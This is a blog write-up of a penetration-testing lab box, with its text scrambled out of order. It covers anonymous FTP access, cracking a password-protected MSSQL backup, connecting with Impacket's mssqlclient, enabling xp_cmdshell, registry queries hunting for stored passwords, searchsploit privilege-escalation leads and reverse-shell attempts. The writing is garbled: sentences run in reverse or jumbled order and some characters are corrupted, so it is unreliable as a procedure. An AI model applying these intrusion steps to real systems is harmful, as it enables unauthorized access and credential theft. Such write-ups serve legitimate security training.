![]() Post-Exploit Enumeration Current User Click to expand USER INFORMATION ![]() Jane doesn't have access to either of these privileged shares, but we do know her password and RDP is open on this host. Now, if we look at the output of the net user command, we can summarize that this is either Administrator 's or jane 's password. EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f pass /t REG_SZ /s' However, this search produced an interesting find. EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f password /t REG_SZ /s' My first registry search returned nothing. I had look around the file system for configuration files that might have a password, but no luck. Just no matter what I tried – encodings, scripts, binaries, nothing worked, which was frustrating to say the least. I tried delivering with:Īnd, I verified the payloads made it on the target. I spent far too long trying a mix of different delivery mechanisms and payload types to get a reverse shell on the target. mssqlclient.py -port 1435 enable_xp_cmdshell Then, we'll need to enable xp_cmdshell to run commands on the host. We can use Impacket's mssqlclient.py script to connect to the MSSQL server. Given the credentials in the backup file, we can execute arbitrary commands on the host.The backup was compressed in a password-protected.Anonymous login to the FTP server allowed for retrieval of a MSSQL backup.The path to code execution on the host went as follows: mssqlclient.py -port 1435 we're connected, we can run enable_xp_cmdshell to allow command execution (I found it was disabled when I first tested the client connection). Now that we have DB credentials from the backup file, let's use Impacket's mssqlclient.py to connect to the database and see what we can do. The nmap scan identifies this as Microsoft SQL Server 2017. Nothing interesting with the gobuster enumeration. Gobuster Enumeration gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,asp,html -r -o gobuster80.txt Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (M | windows/local/47944.rb Plantronics Hub 3.13.2 - Local Privilege Escalation | windows/local/47845.txt Looks like there are some privilege escalation possibilities to keep in our pocket for later. I check searchsploit for anything related to this product. I search Google for the Plantronics Hub logo and get a match. Looking at the icon on this page, I'm not familiar with it. Looks like some database admin credentials, possibly. Let's see if we can open the archive now. We can try and crack it with john by using the rar2john tool. Let's make a directory and store the files there. The nmap scan results show that anonymous logon is enabled. # Nmap done at Mon Aug 29 23:04:00 2022 - 1 IP address (1 host up) scanned in 89.54 seconds |_ message_signing: disabled (dangerous, but default) |_ Message signing enabled but not required Service Info: OSs: Windows, Windows Server 2008 R2 - 2012 CPE: cpe:/o:microsoft:windows OS fingerprint not ideal because: Timing level 5 (Insane) used Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port |_http-server-header: Microsoft-HTTPAPI/2.0 |_ssl-date: T03:03:59+00:00 0s from scanner time.ģ389/tcp open ms-wbt-server Microsoft Terminal Servicesĥ985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | ftp-anon: Anonymous FTP login allowed (FTP code 230)
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |